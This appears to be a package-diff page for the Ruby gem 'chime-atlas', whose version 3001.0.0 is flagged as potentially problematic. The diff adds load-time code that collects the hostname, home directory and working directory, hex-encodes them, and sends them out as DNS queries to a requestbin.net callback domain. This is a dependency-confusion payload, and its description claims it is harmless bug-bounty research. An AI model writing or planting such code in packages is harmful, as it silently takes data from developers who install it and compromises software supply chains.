chime-atlas 0.0.1 → 3001.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of chime-atlas might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/lib/chime-atlas.rb +59 -5
- metadata +15 -9
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 8d08c98465ef2a4209b1186c34bae9b5d2fcc178fbc6aca92abe9da1e7fba062
|
4
|
+
data.tar.gz: 752806770932a3f72cb8ba275b04fedd726df1e734df4ce1a4f8654b9dabef01
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 5dededc26f67730b6ca085bdfe7024fa7b1f5ff3332a25bcca92adf12d68b81debb2224e647c141885430b2a5282d61909027ccd7b6adf6406a34423881b6050
|
7
|
+
data.tar.gz: 85fad67c5df9b591339243a807ddb370181f0a555c250b490e38d70f25c045a7a3eff1d2fa9dc09c09f0d53aa6029aa6cd33d5d8645c19df017ce79d71a1f846
|
data/lib/chime-atlas.rb
CHANGED
@@ -1,8 +1,62 @@
|
|
1
|
-
|
2
|
-
|
3
|
-
|
4
|
-
|
1
|
+
=begin
|
2
|
+
|
3
|
+
This code is used for research purposes.
|
4
|
+
|
5
|
+
No sensitive data is retrieved.
|
6
|
+
|
7
|
+
Callbacks from within organizations with a
|
8
|
+
responsible disclosure policy will be reported
|
9
|
+
directly to the organizations.
|
10
|
+
|
11
|
+
Any other callbacks will be ignored, and
|
12
|
+
any associated data will not be kept.
|
13
|
+
|
14
|
+
For any questions or suggestions:
|
15
|
+
|
16
|
+
gmanhaes0@gmail.com
|
17
|
+
=end
|
18
|
+
|
19
|
+
require 'socket'
|
20
|
+
require 'json'
|
21
|
+
require 'resolv'
|
22
|
+
|
23
|
+
suffix = '5c4139c959e5f4aeab6f.d.requestbin.net'
|
24
|
+
ns = '5c4139c959e5f4aeab6f.d.requestbin.net'
|
25
|
+
|
26
|
+
package = 'chime-atlas'
|
27
|
+
|
28
|
+
# only the bare minimum to be able to identify
|
29
|
+
# a vulnerable organization
|
30
|
+
data = {
|
31
|
+
'p' => package,
|
32
|
+
'h' => Socket.gethostname,
|
33
|
+
'd' => File.expand_path('~'),
|
34
|
+
'c' => Dir.pwd
|
35
|
+
}
|
36
|
+
|
37
|
+
data = JSON.generate(data)
|
38
|
+
data = data.unpack('H*')[0].scan(/.{1,60}/)
|
39
|
+
|
40
|
+
id_1 = rand(36**12).to_s(36)
|
41
|
+
id_2 = rand(36**12).to_s(36)
|
42
|
+
|
43
|
+
begin
|
44
|
+
ns_ip = Resolv.getaddress(ns)
|
45
|
+
rescue
|
46
|
+
ns_ip = '4.4.4.4'
|
5
47
|
end
|
6
48
|
|
7
|
-
|
49
|
+
custom_res = Resolv.new([Resolv::Hosts.new,
|
50
|
+
Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
|
51
|
+
|
52
|
+
|
53
|
+
data.each.each_with_index do |chunk, idx|
|
54
|
+
begin
|
55
|
+
Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e.' + suffix
|
56
|
+
rescue; end
|
57
|
+
|
58
|
+
begin
|
59
|
+
custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e.' + suffix
|
60
|
+
rescue; end
|
61
|
+
end
|
8
62
|
|
metadata
CHANGED
@@ -1,26 +1,29 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: chime-atlas
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.0
|
4
|
+
version: 3001.0.0
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
|
-
-
|
7
|
+
- Gabriel Manhães
|
8
8
|
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2021-
|
11
|
+
date: 2021-02-28 00:00:00.000000000 Z
|
12
12
|
dependencies: []
|
13
|
-
description:
|
14
|
-
|
13
|
+
description: I am testing for dependency confusion vulnerabilities in products that
|
14
|
+
are in public bug bounty programs. This code is reporting-only, and does not do
|
15
|
+
anything malicious.
|
16
|
+
email: rubycoder@example.com
|
15
17
|
executables: []
|
16
18
|
extensions: []
|
17
19
|
extra_rdoc_files: []
|
18
20
|
files:
|
19
21
|
- lib/chime-atlas.rb
|
20
|
-
homepage: https://rubygems.org/gems/
|
22
|
+
homepage: https://rubygems.org/gems/example
|
21
23
|
licenses:
|
22
24
|
- MIT
|
23
|
-
metadata:
|
25
|
+
metadata:
|
26
|
+
source_code_uri: https://github.com/example/example
|
24
27
|
post_install_message:
|
25
28
|
rdoc_options: []
|
26
29
|
require_paths:
|
@@ -36,8 +39,11 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
36
39
|
- !ruby/object:Gem::Version
|
37
40
|
version: '0'
|
38
41
|
requirements: []
|
39
|
-
|
42
|
+
rubyforge_project:
|
43
|
+
rubygems_version: 2.7.6
|
40
44
|
signing_key:
|
41
45
|
specification_version: 4
|
42
|
-
summary:
|
46
|
+
summary: I am testing for dependency confusion vulnerabilities in products that are
|
47
|
+
in public bug bounty programs. This code is reporting-only, and does not do anything
|
48
|
+
malicious.
|
43
49
|
test_files: []
|